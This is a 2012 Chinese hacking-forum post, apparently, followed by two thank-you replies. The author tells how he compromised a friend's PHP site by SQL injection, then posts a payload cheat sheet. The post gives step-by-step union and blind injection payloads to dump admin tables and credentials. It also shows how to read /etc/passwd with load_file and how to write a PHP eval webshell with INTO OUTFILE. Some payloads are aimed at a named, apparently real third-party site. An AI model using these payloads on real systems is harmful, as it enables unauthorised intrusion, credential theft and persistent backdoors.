找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2747|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
: U  G0 `! H2 g; y* `% _: t让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
! N& j! g) f5 E/ Q; t我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。2 N6 z; M) _3 E2 E2 O: c. L
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
+ i; {& z9 |% Y, u4 O1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
! P; Y1 h! |8 t* G5 w3 N- B这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:& W' f- p0 J1 G* z
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/ ~2 X2 K; X5 F" F
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入2 a5 v3 E& |: {
                        
4 Z4 H$ i# _. L+ k. J) ~2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
5 Q7 p3 R! U7 w# `3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意& m2 M+ J8 Q4 j  ], n) u
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息4 h' r; T; H  U0 q( r5 W) N) b  V
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。( w, P0 `8 j" n3 W# ?! X; n( K
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,; Z1 |0 ], B1 _/ q/ ~
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
/ ^; C& n- [# K我就用的是第二个思路,
6 u- Y( o# G- c! H* R: T/ P提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
& p/ d/ V/ ?7 E7 R  X( |$ D* E6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
+ @! y4 a/ E; G- B( R* c( v6 d- H提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
$ i6 x+ ~4 `4 a9 L注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。- F& c* F" ^2 Q& z( h. c; X
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
+ u/ ~2 A5 e" X$ o+ ^5 B. e是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
  c3 @4 i* }# i( O+ W5 t提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
" K" J& B/ {' j6 Y; s8 w然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
$ q9 w& u: Z+ y% Q调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......" j. F9 S+ C1 o% E/ I- p# [. W% M3 ~
下面是一些很普遍注入方式资料:
0 A, B. _- Q- j( W# Y/ F: n注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='# ^( u+ Y- P$ F- Z5 ]  z+ L' _
拆半法* d3 V- Y) K" \: C6 J
######################################
; T2 C  a$ R0 b9 ?7 ^0 s+ tand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
7 C, T9 E% {) kand exists (select * from admin)
# K7 N& l9 @+ V( ?and exists(select id from admin)0 k# v; _& |& }: i' X+ ~
and exists(select id from admin where id=1)
: j3 G$ u9 M, H. M8 Band exists(select id from admin where id>1) ' {' B& F& D; I
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 $ ^- T2 I; J5 R' T4 i+ L
and exists (select username from admin)& A% I" q6 c# M+ I0 I
and exists (select password from admin)
( R& [* R: t. Cand exists (select id from admin where len(username)<10 and id=1)* A- Q% y4 ^3 p- i/ Z9 i+ G
and exists (select id from admin where len(username)>5 and id=1)3 |  H2 p" \' W/ W' V; s8 K( _
and exists (select id from admin where len(username)=6 and id=1)
+ j# B5 V* }( a5 o+ R+ t- zand exists (select id from admin where len(password)<10 and id=1)
) `- n# R# ~4 F, k0 b9 G, j# S( gand exists (select id from admin where len(password)>5 and id=1)
$ f; B5 y, a2 b9 s5 h& Z" hand exists (select id from admin where len(password)=7 and id=1)
4 I- ]( c$ d& p! S( ]9 Kand (select top 1 asc(mid(username,1,1)) from admin)=97
8 a. J1 ]6 J  C/ V4 L返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。. j; Z6 h2 B* E2 ~. }# M( J
猜第二位把username,1,1改成username,2,1就可以了。  r& ~3 Z& Z( H% X7 w' H' I
猜密码把username改成password就OK了
0 r9 h1 a4 J. f$ r! m##################################################
" T' e8 y8 a; G9 U. S搜索型注入
  w" D$ g( r1 r) p' ]##################################3 W) j% T5 B7 m4 E
%' and 1=1 and '%'='7 Y! _" H- K* _8 u4 I1 i, G
%' and exists (select * from admin) and '%'='
; a4 U7 W' t" B  u2 Z%' and exists(select id from admin where id=1) and '%'='- h( q* N9 N9 [9 U) @6 C' e. w$ D$ U
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
2 W' Z$ X. A  C0 ?, g%' and exists (select id from admin where len(password)=7 and id=1) and '%'='5 o& f# L# S' ?1 a2 _
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
/ I( y" o+ w6 i" d: w- m' _! {这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
7 H7 r4 w$ t& o- t: n) U( y- B对于MSSQL数据库,后面可以吧 and '%'='换成--- ~" z5 V9 |3 H" |, F2 i
还有一点搜索型注入也可以使用union语句。
* c0 P. x" H$ k6 e$ b7 P; c########################################################" u3 {" g* y( A) i5 T4 h# v/ q% c
联合查询。
6 |. h& b$ m: G1 K#####################################* ~8 L* T: p2 |3 b; i
order by 10, N. M9 Q0 e( E3 _5 G
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
& w( Q  y8 W" q2 o$ {% F7 ~- X2 hand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin0 t1 }' z1 ~  L- ?
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=16 ^# ?8 \+ P$ F0 ~
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
" U& L: G$ O" l# J& Z8 n' A* o###################################
: N9 x1 J) p$ j1 w0 {% f% Lcookie注入
$ F% c4 Q% j1 W, ^0 m. W3 T7 P###############################
6 r3 t. C5 o/ z) G$ \/ ehttp://www.******.com/shownews.asp?id=127
" M& N/ Z3 z, u, J! I3 m' v0 chttp://www.******.com/shownews.asp
: {2 m  X7 M/ Jalert(="id="+escape("127"));
2 B: Z9 D3 q; D7 |5 T" ealert(="id="+escape("127 and 1=1"));
# {0 |5 b9 Y* Nalert(="id="+escape("127 order by 10"));) l( m- t5 t6 `2 K& o, B1 i
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));. M; y" t2 T/ @1 k! ~
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
+ J9 P; F4 ]. O这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。- G$ w, Y1 H; _
###################################
2 @  A. z* W" Y5 Z6 z* m: d偏移注入
! |% {4 \8 q! \6 \' p$ x8 j! f; n###########################################################
" V6 h$ Z6 J: E5 y8 C0 D7 Q3 Y) K# @union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
) h# B( |4 h& runion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin6 a2 k2 H/ q! \( ~4 Q
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
2 C( g7 x9 I4 H$ Nunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
( h' r  p4 v* Q( W1 C  G" Eunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)" u, [6 O4 a8 V: R) T
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)+ o7 Y7 L" C0 }0 A$ X+ _7 z+ M& _) l
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
8 s% F$ z+ K+ v3 }' [$ _1 ka.id=d.id)
2 [/ e0 ?3 C  S; |+ G2 Nand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)* W/ f# B  L/ ]5 \9 t# }; W
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
0 c& k. B3 t+ u* e% q( B$ t5 Q  
6 M9 ]! v8 u. L, f3 @, F============================================================================================================$ d6 X& B& r+ }4 r4 Z; m' h
1.判断版本
; d4 R3 e/ [6 iand ord(mid(version(),1,1))>51
: C0 y' z# t, y( D+ L: f返回正常,说明大于4.0版本,支持ounion查询
0 Q+ W8 o" i: @% `( Y7 b; J' Q$ X6 r2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解/ @$ p6 d- G% c+ I( y" o- ~8 ]
and 2=4 union select 1,2,3,4,5,6,7,8,9--) q+ x9 Q4 }4 ^$ k7 a
3.查看数据库版本及当前用户,
* t  n- K8 D5 L0 P' ?( ?# S0 V3 Band 2=4 union select 1,user(),version(),4,5,6,7,8,9--2 L+ F4 n  t2 R. q+ y/ [
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
# y* X4 O( e/ L1 c4.判断有没有写权限& G1 ^8 @, K* G+ k
and (select count(*) from MySQL.user)>0-- 7 Y9 f: |" W2 i: ]# `& W8 V
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
% I/ @5 c) }4 H" y1 O用不了这个命令,就学习土耳其黑客手法,如下$ o, d) _" h5 @
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--' U4 q/ _9 y" o# V! H  J2 B
6.爆表,爆库
0 ?  ~! R# {$ i1 z- s7 D# s" g: }9 wand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--0 n( c+ x$ z( u* U9 T
7.爆列名,爆表
, q' d4 Y' d0 i. V: g0 F9 Wand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--6 J' o# x6 j* \. W0 H
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。1 ]4 F5 i6 R7 h1 |! \7 M
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--+ O9 a4 h0 S2 \" N( w0 z
9.爆字段内容/ {. u2 [. ]/ V
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--) ?" x7 B+ K3 `" m( ^* }7 j
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表